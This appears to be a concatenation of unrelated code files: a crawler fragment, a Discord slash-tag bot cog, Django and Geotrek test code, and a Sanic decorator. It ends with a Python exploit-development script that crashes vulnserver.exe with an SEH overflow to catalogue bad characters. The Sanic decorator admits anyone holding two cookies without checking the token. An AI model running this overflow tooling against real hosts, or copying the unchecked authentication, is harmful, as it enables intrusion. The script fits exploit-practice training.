url = "https://en.wiktionary.org/wiki/Wiktionary:All_Thesaurus_pages" # The first url that is entered, required for ignition
pid = 0 #parent id : 0
sid = 1 #self id : 0
cur.execute('''INSERT OR IGNORE INTO wiki_data (cnc, pid, sid, url, html)
VALUES ( ?, ?, ?, ?, ? )''', ( 0,pid,sid, url,"", ) )
# insert the cnc, pid, sid and url
url_crawl(url,1)
else:
# If the db exists
cur.execute('''SELECT min(sid) FROM wiki_data WHERE cnc = ?''',(0,))
sid_ = cur.fetchone()[0] #converts the cursor object to number
print("min sid= ",sid_)
get_next_url = cur.execute('''SELECT url FROM wiki_data WHERE sid = ?''',(sid_,)).fetchone()[0]
url_crawl(str(get_next_url),sid_-1)
|
999,365 | a920c63a3372a0bcde79fcfe08f2ca13c579807c | import asyncio
import logging
import re
import types
from collections import Counter
from copy import copy
from typing import Dict, List, Union
import discord
from redbot.core import commands
from redbot.core.utils.chat_formatting import box, humanize_list, inline, pagify
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from redbot.core.utils.predicates import MessagePredicate
from tabulate import tabulate
from ..abc import MixinMeta
from ..converters import (
GlobalTagConverter,
GuildTagConverter,
PastebinConverter,
TagConverter,
TagName,
TagScriptConverter,
)
from ..http import SlashOptionType
from ..objects import (
ApplicationCommand,
ApplicationCommandType,
SlashOption,
SlashOptionChoice,
SlashTag,
)
from ..testing.button_menus import menu as button_menu
from ..utils import ARGUMENT_NAME_DESCRIPTION, chunks, dev_check
TAG_RE = re.compile(r"(?i)(\[p\])?\b(slash\s?)?tag'?s?\b")
CHOICE_RE = re.compile(r".{1,100}:.{1,100}")
CHOICE_LIMIT = 25
log = logging.getLogger("red.phenom4n4n.slashtags.commands")
def _sub(match: re.Match) -> str:
if match.group(1):
return "[p]slashtag global"
repl = "global "
name = match.group(0)
repl += name
if name.istitle():
repl = repl.title()
return repl
def copy_doc(original: Union[commands.Command, types.FunctionType]):
def decorator(overriden: Union[commands.Command, types.FunctionType]):
doc = original.help if isinstance(original, commands.Command) else original.__doc__
doc = TAG_RE.sub(_sub, doc)
if isinstance(overriden, commands.Command):
overriden._help_override = doc
else:
overriden.__doc__ = doc
return overriden
return decorator
class Commands(MixinMeta):
@commands.guild_only()
@commands.group(aliases=["st"])
async def slashtag(self, ctx: commands.Context):
"""
Slash Tag management with TagScript.
These commands use TagScriptEngine.
[This site](https://phen-cogs.readthedocs.io/en/latest/index.html) has documentation on how to use TagScript blocks.
"""
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("add", aliases=["create", "+"])
async def slashtag_add(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a slash tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(ctx, tag_name, tagscript, is_global=False)
async def create_slash_tag(
self,
ctx: commands.Context,
tag_name: str,
tagscript: str,
*,
is_global: bool = False,
command_type: ApplicationCommandType = ApplicationCommandType.CHAT_INPUT,
):
options: List[SlashOption] = []
guild_id = None if is_global else ctx.guild.id
if command_type == ApplicationCommandType.CHAT_INPUT:
try:
description = await self.send_and_query_response(
ctx,
"What should the tag description to be? (maximum 100 characters)",
pred=MessagePredicate.length_less(101, ctx),
)
except asyncio.TimeoutError:
return await ctx.send("Tag addition timed out.")
else:
description = ""
if command_type == ApplicationCommandType.CHAT_INPUT:
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Would you like to add arguments to this tag? (Y/n)", pred
)
except asyncio.TimeoutError:
await ctx.send("Query timed out, not adding arguments.")
else:
if pred.result is True:
await self.get_options(ctx, options)
command = ApplicationCommand(
self,
name=tag_name,
description=description,
guild_id=guild_id,
options=options,
type=command_type,
)
try:
await command.register()
except discord.Forbidden as error:
log.error(
f"Failed to create command {command!r} on guild {ctx.guild!r}", exc_info=error
)
text = (
"Looks like I don't have permission to add Slash Commands here. Reinvite me "
"with this invite link and try again: <https://discordapp.com/oauth2/authorize"
f"?client_id={self.bot.user.id}&scope=bot%20applications.commands>"
)
return await ctx.send(text)
except Exception as error:
log.error(f"Failed to create command {command!r} on guild {ctx.guild!r}")
# exc info unneeded since error handler should print it, however info on the command options is needed
raise
tag = SlashTag(
self,
tagscript,
guild_id=guild_id,
author_id=ctx.author.id,
command=command,
)
self.command_cache[tag.command.id] = tag.command
await ctx.send(await tag.initialize())
async def get_options(
self, ctx: commands.Context, options: List[SlashOption]
) -> List[SlashOption]:
added_required = False
for i in range(1, 11):
try:
option = await self.get_option(ctx, added_required=added_required)
if not option.required:
added_required = True
except asyncio.TimeoutError:
await ctx.send("Adding this argument timed out.", delete_after=15)
break
options.append(option)
if i == 10:
break
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Would you like to add another argument? (Y/n)", pred
)
except asyncio.TimeoutError:
await ctx.send("Query timed out, not adding additional arguments.")
break
if pred.result is False:
break
return options
async def send_and_query_response(
self,
ctx: commands.Context,
query: str,
pred: MessagePredicate = None,
*,
timeout: int = 60,
) -> str:
if pred is None:
pred = MessagePredicate.same_context(ctx)
ask = await ctx.send(query)
try:
message = await self.bot.wait_for("message", check=pred, timeout=timeout)
except asyncio.TimeoutError:
await self.delete_quietly(ask)
raise
await self.delete_quietly(ask)
await self.delete_quietly(message)
return message.content
async def get_choices(self, ctx: commands.Context) -> List[SlashOptionChoice]:
query = (
"Send the list of choice names and values you would like to add as choices to "
"the tag. Choice names and values should be seperated by `:`, and each choice "
"should be seperated by `|`. Example:\n`dog:Doggo|cat:Catto`"
)
response = await self.send_and_query_response(ctx, query)
choices = []
for index, choice_text in enumerate(response.split("|"), 1):
if ":" not in choice_text:
await ctx.send(
f"Failed to parse `{choice_text}` to a choice as its name and value "
"weren't seperated by a `:`.",
delete_after=15,
)
continue
if not CHOICE_RE.match(choice_text):
await ctx.send(
f"Failed to parse `{choice_text}` to a choice as "
"its name or value exceeded the 100 character limit.",
delete_after=15,
)
continue
choice = SlashOptionChoice(*choice_text.split(":", 1))
choices.append(choice)
if len(choices) >= CHOICE_LIMIT:
await ctx.send(f"Reached max choices ({CHOICE_LIMIT}).")
break
return choices
async def get_option(
self, ctx: commands.Context, *, added_required: bool = False
) -> SlashOption:
name_desc = [
"What should the argument name be and description be?",
"The argument name and description should be split by a `:`.",
"Example: `member:A member of this server.`\n",
"*Slash argument names may not exceed 32 characters and can only contain characters "
"that are alphanumeric or '_' or '-'.",
"The argument description must be less than or equal to 100 characters.*",
]
name_pred = MessagePredicate.regex(ARGUMENT_NAME_DESCRIPTION, ctx)
await self.send_and_query_response(ctx, "\n".join(name_desc), name_pred)
match = name_pred.result
name, description = match.group(1), match.group(2)
valid_option_types = [
name.lower()
for name in SlashOptionType.__members__.keys()
if not name.startswith("SUB")
]
valid_option_types.append("choices")
option_query = [
"What should the argument type be?",
f"Valid option types: {humanize_list([inline(n) for n in valid_option_types])}",
"(select `string` if you don't understand)",
]
option_type = await self.send_and_query_response(
ctx,
"\n".join(option_query),
MessagePredicate.lower_contained_in(valid_option_types, ctx),
)
if option_type.lower() == "choices":
choices = await self.get_choices(ctx)
option_type = "STRING"
else:
choices = []
option_type = SlashOptionType[option_type.upper()]
if not added_required:
pred = MessagePredicate.yes_or_no(ctx)
await self.send_and_query_response(
ctx,
"Is this argument required? (Y/n)\n*Keep in mind that if you choose to make this argument optional, all following arguments must also be optional.*",
pred,
)
required = pred.result
else:
await ctx.send(
"This argument was automatically made optional as the previous one was optional.",
delete_after=15,
)
required = False
return SlashOption(
name=name.lower(),
description=description,
option_type=option_type,
required=required,
choices=choices,
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("message")
async def slashtag_message(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False, check_regex=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a message command tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.MESSAGE
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("user")
async def slashtag_user(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False, check_regex=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a user command tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("pastebin", aliases=["++"])
async def slashtag_pastebin(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False),
*,
link: PastebinConverter,
):
"""
Add a slash tag with a Pastebin link.
"""
await self.create_slash_tag(ctx, tag_name, link, is_global=False)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.group("edit", aliases=["e"], invoke_without_command=True)
async def slashtag_edit(
self, ctx: commands.Context, tag: GuildTagConverter, *, tagscript: TagScriptConverter
):
"""Edit a slash tag."""
await ctx.send(await tag.edit_tagscript(tagscript))
@slashtag_edit.command("tagscript")
async def slashtag_edit_tagscript(
self, ctx: commands.Context, tag: GuildTagConverter, *, tagscript: TagScriptConverter
):
"""Edit a slash tag's TagScript."""
await self.slashtag_edit(ctx, tag, tagscript=tagscript)
@slashtag_edit.command("name")
async def slashtag_edit_name(
self, ctx: commands.Context, tag: GuildTagConverter, *, name: TagName(check_global=False)
):
"""Edit a slash tag's name."""
await ctx.send(await tag.edit_name(name))
@slashtag_edit.command("description")
async def slashtag_edit_description(
self, ctx: commands.Context, tag: GuildTagConverter, *, description: str
):
"""Edit a slash tag's description."""
await ctx.send(await tag.edit_description(description))
@slashtag_edit.command("arguments", aliases=["options"])
async def slashtag_edit_arguments(self, ctx: commands.Context, tag: GuildTagConverter):
"""
Edit a slash tag's arguments.
See [this documentation page](https://phen-cogs.readthedocs.io/en/latest/slashtags/slash_arguments.html) for more information on slash tag arguments.
"""
await tag.edit_options(ctx)
@slashtag_edit.command("argument", aliases=["option"])
async def slashtag_edit_argument(
self, ctx: commands.Context, tag: GuildTagConverter, argument: str
):
"""Edit a single slash tag's argument by name."""
await tag.edit_single_option(ctx, argument)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("remove", aliases=["delete", "-"])
async def slashtag_remove(self, ctx: commands.Context, *, tag: GuildTagConverter):
"""Delete a slash tag."""
await ctx.send(await tag.delete())
@slashtag.command("info")
async def slashtag_info(self, ctx: commands.Context, *, tag: TagConverter):
"""Get info about a slash tag that is stored on this server."""
await tag.send_info(ctx)
@slashtag.command("raw")
async def slashtag_raw(self, ctx: commands.Context, *, tag: GuildTagConverter):
"""Get a slash tag's raw content."""
await tag.send_raw_tagscript(ctx)
@classmethod
def format_tagscript(cls, tag: SlashTag, limit: int = 60) -> str:
title = f"`{tag.type.get_prefix()}{tag.name}` - "
limit -= len(title)
tagscript = tag.tagscript
if len(tagscript) > limit - 3:
tagscript = tagscript[:limit] + "..."
tagscript = tagscript.replace("\n", " ")
return f"{title}{discord.utils.escape_markdown(tagscript)}"
async def view_slash_tags(
self,
ctx: commands.Context,
tags: Dict[int, SlashTag],
*,
is_global: bool,
):
description = [
self.format_tagscript(tag) for tag in sorted(tags.values(), key=lambda t: t.name)
]
description = "\n".join(description)
e = discord.Embed(color=await ctx.embed_color())
if is_global:
slash_tags = "global slash tags"
e.set_author(name="Global Slash Tags", icon_url=ctx.me.avatar_url)
else:
slash_tags = "slash tags"
e.set_author(name="Stored Slash Tags", icon_url=ctx.guild.icon_url)
embeds = []
pages = list(pagify(description))
for index, page in enumerate(pages, 1):
embed = e.copy()
embed.description = page
embed.set_footer(text=f"{index}/{len(pages)} | {len(tags)} {slash_tags}")
embeds.append(embed)
# await menu(ctx, embeds, DEFAULT_CONTROLS)
await button_menu(ctx, embeds)
@slashtag.command("list")
async def slashtag_list(self, ctx: commands.Context):
"""View stored slash tags."""
tags = self.guild_tag_cache[ctx.guild.id]
if not tags:
return await ctx.send("There are no slash tags on this server.")
await self.view_slash_tags(ctx, tags, is_global=False)
async def show_slash_tag_usage(self, ctx: commands.Context, guild: discord.Guild = None):
tags = self.guild_tag_cache[guild.id] if guild else self.global_tag_cache
if not tags:
message = (
"This server has no slash tags." if guild else "There are no global slash tags."
)
return await ctx.send(message)
counter = Counter({tag.name: tag.uses for tag in tags.copy().values()})
e = discord.Embed(title="Slash Tag Stats", color=await ctx.embed_color())
embeds = []
for usage_data in chunks(counter.most_common(), 10):
usage_chart = box(tabulate(usage_data, headers=("Tag", "Uses")), "prolog")
embed = e.copy()
embed.description = usage_chart
embeds.append(embed)
await menu(ctx, embeds, DEFAULT_CONTROLS)
@slashtag.command("usage", aliases=["stats"])
async def slashtag_usage(self, ctx: commands.Context):
"""
See this slash tag usage stats.
**Example:**
`[p]slashtag usage`
"""
await self.show_slash_tag_usage(ctx, ctx.guild)
@commands.is_owner()
@slashtag.command("clear", hidden=True)
async def slashtag_clear(self, ctx: commands.Context):
"""Clear all slash tags for this server."""
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Are you sure you want to delete all slash tags on this server? (Y/n)", pred
)
except asyncio.TimeoutError:
return await ctx.send("Timed out, not deleting slash tags.")
if not pred.result:
return await ctx.send("Ok, not deleting slash tags.")
guild: discord.Guild = ctx.guild
await self.http.put_guild_slash_commands(guild.id, [])
for tag in copy(self.guild_tag_cache[guild.id]).values():
tag.remove_from_cache()
tag.command.remove_from_cache()
del tag
self.guild_tag_cache[guild.id].clear()
await self.config.guild(guild).tags.clear()
await ctx.send("Tags deleted.")
@commands.is_owner()
@slashtag.group("global")
@copy_doc(slashtag)
async def slashtag_global(self, ctx: commands.Context):
pass
@slashtag_global.command("add")
@copy_doc(slashtag_add)
async def slashtag_global_add(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(ctx, tag_name, tagscript, is_global=True)
@commands.mod_or_permissions(manage_guild=True)
@slashtag_global.command("message")
@copy_doc(slashtag_message)
async def slashtag_global_message(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True, check_regex=False),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=True, command_type=ApplicationCommandType.MESSAGE
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag_global.command("user")
@copy_doc(slashtag_user)
async def slashtag_global_user(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True, check_regex=False),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=True, command_type=ApplicationCommandType.USER
)
@slashtag_global.command("pastebin", aliases=["++"])
@copy_doc(slashtag_pastebin)
async def slashtag_global_pastebin(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False),
*,
link: PastebinConverter,
):
await self.create_slash_tag(ctx, tag_name, link, is_global=True)
@slashtag_global.group("edit", aliases=["e"], invoke_without_command=True)
@copy_doc(slashtag_edit)
async def slashtag_global_edit(
self, ctx: commands.Context, tag: GlobalTagConverter, *, tagscript: TagScriptConverter
):
await ctx.send(await tag.edit_tagscript(tagscript))
@slashtag_global_edit.command("tagscript")
@copy_doc(slashtag_edit_tagscript)
async def slashtag_global_edit_tagscript(
self, ctx: commands.Context, tag: GlobalTagConverter, *, tagscript: TagScriptConverter
):
await self.slashtag_global_edit(ctx, tag, tagscript=tagscript)
@slashtag_global_edit.command("name")
@copy_doc(slashtag_edit_name)
async def slashtag_global_edit_name(
self,
ctx: commands.Context,
tag: GlobalTagConverter,
*,
name: TagName(global_priority=True),
):
await ctx.send(await tag.edit_name(name))
@slashtag_global_edit.command("description")
@copy_doc(slashtag_edit_description)
async def slashtag_global_edit_description(
self, ctx: commands.Context, tag: GlobalTagConverter, *, description: str
):
await ctx.send(await tag.edit_description(description))
@slashtag_global_edit.command("arguments", aliases=["options"])
@copy_doc(slashtag_edit_arguments)
async def slashtag_global_edit_arguments(self, ctx: commands.Context, tag: GlobalTagConverter):
await tag.edit_options(ctx)
@slashtag_global_edit.command("argument", aliases=["option"])
@copy_doc(slashtag_edit_argument)
async def slashtag_global_edit_argument(
self, ctx: commands.Context, tag: GuildTagConverter, argument: str
):
await tag.edit_single_option(ctx, argument)
@slashtag_global.command("remove", aliases=["delete", "-"])
@copy_doc(slashtag_remove)
async def slashtag_global_remove(self, ctx: commands.Context, *, tag: GlobalTagConverter):
await ctx.send(await tag.delete())
@slashtag_global.command("raw")
@copy_doc(slashtag_raw)
async def slashtag_global_raw(self, ctx: commands.Context, *, tag: GlobalTagConverter):
await tag.send_raw_tagscript(ctx)
@slashtag_global.command("list")
@copy_doc(slashtag_list)
async def slashtag_global_list(self, ctx: commands.Context):
tags = self.global_tag_cache
if not tags:
return await ctx.send("There are no global slash tags.")
await self.view_slash_tags(ctx, tags, is_global=True)
@slashtag_global.command("usage", aliases=["stats"])
@copy_doc(slashtag_usage)
async def slashtag_global_usage(self, ctx: commands.Context):
await self.show_slash_tag_usage(ctx)
@commands.is_owner()
@commands.group(aliases=["slashset"])
async def slashtagset(self, ctx: commands.Context):
"""Manage SlashTags settings."""
@slashtagset.command("settings")
async def slashtagset_settings(self, ctx: commands.Context):
"""View SlashTags settings."""
eval_command = f"✅ (**{self.eval_command}**)" if self.eval_command else "❎"
testing_enabled = f"✅" if self.testing_enabled else "❎"
description = [
f"Application ID: **{self.application_id}**",
f"Eval command: {eval_command}",
f"Test cog loaded: {testing_enabled}",
]
embed = discord.Embed(
color=0xC9C9C9, title="SlashTags Settings", description="\n".join(description)
)
await ctx.send(embed=embed)
@slashtagset.command("appid")
async def slashtagset_appid(self, ctx: commands.Context, id: int = None):
"""
Manually set the application ID for [botname] slash commands if it differs from the bot user ID.
This only applies to legacy bots. If you don't know what this means, you don't need to worry about it.
"""
app_id = id or self.bot.user.id
await self.config.application_id.set(app_id)
self.application_id = app_id
await ctx.send(f"Application ID set to `{id}`.")
@commands.check(dev_check)
@slashtagset.command("addeval")
async def slashtagset_addeval(self, ctx: commands.Context):
"""Add a slash eval command for debugging."""
if self.eval_command:
return await ctx.send("An eval command is already registered.")
slasheval = ApplicationCommand(
self,
name="eval",
description="SlashTags debugging eval command. Only bot owners can use this.",
options=[
SlashOption(name="body", description="Code body to evaluate.", required=True)
],
)
await slasheval.register()
await self.config.eval_command.set(slasheval.id)
self.eval_command = slasheval.id
await ctx.send("`/eval` has been registered.")
@commands.check(dev_check)
@slashtagset.command("rmeval")
async def slashtagset_rmeval(self, ctx: commands.Context):
"""Remove the slash eval command."""
if not self.eval_command:
return await ctx.send("The eval command hasn't been registered.")
try:
await self.http.remove_slash_command(self.eval_command)
except discord.HTTPException:
pass
await self.config.eval_command.clear()
self.eval_command = None
await ctx.send("`/eval` has been deleted.")
@slashtagset.command("testing")
async def slashtagset_testing(self, ctx: commands.Context, true_or_false: bool = None):
"""
Load or unload the SlashTag interaction development test cog.
"""
target_state = (
true_or_false if true_or_false is not None else not await self.config.testing_enabled()
)
if target_state is self.testing_enabled:
loaded = "loaded" if target_state else "unloaded"
return await ctx.send(f"The SlashTag interaction testing cog is already {loaded}.")
await self.config.testing_enabled.set(target_state)
if target_state:
loaded = "Loaded"
self.add_test_cog()
else:
loaded = "Unloaded"
self.remove_test_cog()
await ctx.send(f"{loaded} the SlashTag interaction testing cog.")
|
999,366 | 71c8c555ff36981026018503e04b550e40385cd0 | from django.apps import AppConfig
import os
default_app_config = 'apps.base_info.apps.BaseInfoConfig'
|
999,367 | 9f98fbf03e50e6a9a480f9978814fb8346241ba0 | from unittest import skipIf
from django.conf import settings
from django.contrib.gis.geos import LineString, Point
from django.test import TestCase
from geotrek.land.tests.test_filters import LandFiltersTest
from geotrek.core.factories import PathFactory, TrailFactory
from geotrek.core.filters import PathFilterSet, TopologyFilter
from geotrek.core.models import Topology
from geotrek.trekking.factories import TrekFactory
from geotrek.trekking.filters import TrekFilterSet
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class PathFilterLandTest(LandFiltersTest):
filterclass = PathFilterSet
class TestFilter(TopologyFilter):
model = Topology
class TopologyFilterTest(TestCase):
def test_values_to_edges(self):
topology = TestFilter()
with self.assertRaises(NotImplementedError):
topology.values_to_edges(['Value'])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class TopologyFilterTrailTest(TestCase):
def setUp(self):
self.path = PathFactory()
self.trail = TrailFactory(paths=[(self.path, 0, 1)])
def test_trail_filters(self):
PathFactory()
qs = PathFilterSet().qs
self.assertEqual(qs.count(), 2)
data = {'trail': [self.trail]}
qs = PathFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
class ValidTopologyFilterTest(TestCase):
def setUp(self):
if settings.TREKKING_TOPOLOGY_ENABLED:
self.path = PathFactory()
self.trek = TrekFactory.create(name="Crossed", paths=[(self.path, 0, 1)])
else:
self.trek = TrekFactory.create(geom=LineString((0, 0), (5, 5)))
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_trek_filters_not_valid(self):
trek = TrekFactory.create(name="Not crossed", paths=[(self.path, 0, 0.5)])
TrekFactory.create(paths=[])
qs = TrekFilterSet().qs
self.assertEqual(qs.count(), 3)
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertEqual(qs.count(), 2)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
geom = LineString(Point(700100, 6600000), Point(700000, 6600100), srid=settings.SRID)
PathFactory.create(geom=geom)
self.trek.reload()
trek.reload()
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertNotIn(self.trek, qs)
self.assertIn(trek, qs)
self.assertEqual(qs.count(), 1)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertNotIn(trek, qs)
self.assertEqual(qs.count(), 2)
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_trek_filters_not_valid_nds(self):
TrekFactory.create(name="Empty", geom='SRID=2154;LINESTRING EMPTY')
qs = TrekFilterSet().qs
self.assertEqual(qs.count(), 2)
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertEqual(qs.count(), 1)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
|
999,368 | a0ce739de2ed18a8463b7f2df2563bd58e438c27 |
from functools import wraps
from sanic.response import redirect
def jwt_required():
def decorator(f):
@wraps(f)
async def decorated_function(request, *args, **kwargs):
json_token = request.cookies.get('lock-jwt')
refresh_token = request.cookies.get('lock-rtk')
if json_token != None and refresh_token != None:
response = await f(request, *args, **kwargs)
return response
return redirect('/')
return decorated_function
return decorator |
999,369 | e1de8a813d1741fd014fc966401faa3b7775050a | import subprocess
subprocess.call(["/opt/imt/robot/crob/tools/plcenter"])
|
999,370 | b9bfa4cc40d8d30040b7fcc544351b15b66398f1 | #!/usr/bin/python
import sys
import socket
import struct
from pydbg import *
from pydbg.defines import *
import pythoncom
import struct
import random
import wmi
import subprocess
import os
import time
import threading
from threading import Lock, Thread
allchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
process_name = "vulnserver.exe" ##CHANGE THIS
process_is_running = False
good_chars = []
bad_chars = []
lock = threading.Lock()
start_crash = False
start_cmd = 'start cmd /C "C:\\start.bat"' ##CHANGE THIS
#start_cmd = 'C:\\start.bat' ##CHANGE THIS
#start_cmd = "net start vulnserver.exe"
def start_service(process_name,start_cmd):
global pid
##NOCHANGESINTHEFUNCTION
pythoncom.CoInitialize ()
for process in wmi.WMI().Win32_Process():
if process.Name==process_name:
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /im '+ process_name + ' /f').communicate()
process_is_running = False
print("[+] Starting the service...")
# Start the process with reliability
#subprocess.Popen('taskkill /im ovas.exe /f').communicate()
#subprocess.Popen('C:/Program Files/HP OpenView/bin/ovas.exe', stdin=PIPE, stderr=PIPE, stdout=PIPE).communicate()
os.system(start_cmd)
print ("[*] Waiting for the process to start ..")
process_is_running = True
time.sleep(2)
pid = find_process_id(process_name, process_is_running)
if pid:
print("[+] The service was started.")
global start_crash
lock.acquire()
start_crash = True
lock.release()
print "[+] Crash Flag set to" + str(start_crash)
else:
print("[-] Service was not found in process list. Restarting...")
return start_service(process_name,start_cmd)
def find_process_id(process_name, process_is_running):
##NOCHANGESINTHEFUNCTION
#Function to find the process ID and return pid
# Get the process ID of the services
print "[2] Making sure the service " + process_name + " was restarted and getting the pid"
process_check_counter = 0
pythoncom.CoInitialize ()
while process_is_running:
for process in wmi.WMI().Win32_Process():
if process.Name=="vulnserver.exe":
print "[+]The process is running with process id: " + str(process.ProcessId)
return process.ProcessId
if process_check_counter > 4: # Give it 5 attempts
print "[-] Failed to get the pid or start the process"
return False
process_check_counter += 1
def check_accessv(dbg):
##NOCHANGESINTHEFUNCTION
# We skip first-chance exceptions
#if dbg.dbg.u.Exception.dwFirstChance:
# return DBG_EXCEPTION_NOT_HANDLED
#crash_bin = utils.crash_binning.crash_binning()
#crash_bin.record_crash(dbg)
#print crash_bin.crash_synopsis()
##CHANGE THIS
esp_offset = 0x25 # this is in hex
print "[+] Access violation caught!!"
print "EAX: %08x" % (dbg.context.Eax)
print "ESP: %08x" % (dbg.context.Esp)
print "EIP: %08x" % (dbg.context.Eip)
# I had an offset of 37 or 0x25 from the ESP to crash payload
esp_dump = dbg.read(dbg.context.Esp + esp_offset, 4) # dump 4 bytes in memory pointed by ESP
esp_dump_hex = esp_dump.encode('hex')
print esp_dump_hex
identify_bad_characters(esp_dump_hex)
#dbg.terminate_process()
#return DBG_CONTINUE
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def start_debugging(pid):
##NOCHANGESINTHEFUNCTION
print "[3] Attaching the process to pydbg"
dbg = pydbg()
dbg.attach(int(pid))
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION,check_accessv)
dbg.run()
#return start_service()
def identify_bad_characters(esp_memory_dump):
##NOCHANGESINTHEFUNCTION
global good_chars, bad_chars
if (esp_memory_dump == current_char * 4):
print "[+] I found a good character: " + str(current_char)
good_chars.append(current_char)
with open("c:\\good_character_list.txt",'a+') as f:
f.write("\\x" + str(current_char))
else:
print "[+] I found a bad character: " + str(current_char)
bad_chars.append(current_char)
with open("c:\\bad_character_list.txt",'a+') as f:
f.write("\\x" + str(current_char))
with open("c:\\all_character_list.txt", 'a+') as f:
f.write("\\x" + str(current_char) + " => " + str(esp_memory_dump) +"\n" )
print "[+] Printing all bad characters: " + str(bad_chars)
print "[+] Printing all good characters: " + str(good_chars)
def crash_me():
print("[+] Entered crash_me");
global start_crash, current_char
lock.acquire()
start_crash = False
lock.release()
counter = 0
timer= 0
while True:
print start_crash
if start_crash:
if counter < (len(allchars)):
time.sleep(10)
current_char = allchars[counter].encode('hex')
print "[+] The currrent character is " + str(current_char) + " of index " + str(counter)
junk0 = allchars[counter] * 4 # put the bad character here
#Copy pasta the crash function here
host = "192.168.214.135"
port = 9999
nseh_offset = 3491-4
seh_offset = 3491
total_buffer = 5005
#junk1 = "\x41" * nseh_offset
##CHANGE THIS
junk1 = junk0 + "\x41" * (nseh_offset - len(junk0))
##CHANGE THIS
nseh = "\x42" * 4
seh = "\x41" * 4
junk2 = "\x44" * (total_buffer - seh_offset)
junk = junk1 + nseh + seh + junk2
cmd = "LTER /.:/{}\r\n"
payload = cmd + junk + "\r\n\r\n"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #SOCK_STREAM for TCP
s.connect((host, port))
s.recv(999999)
s.send(payload)
s.close()
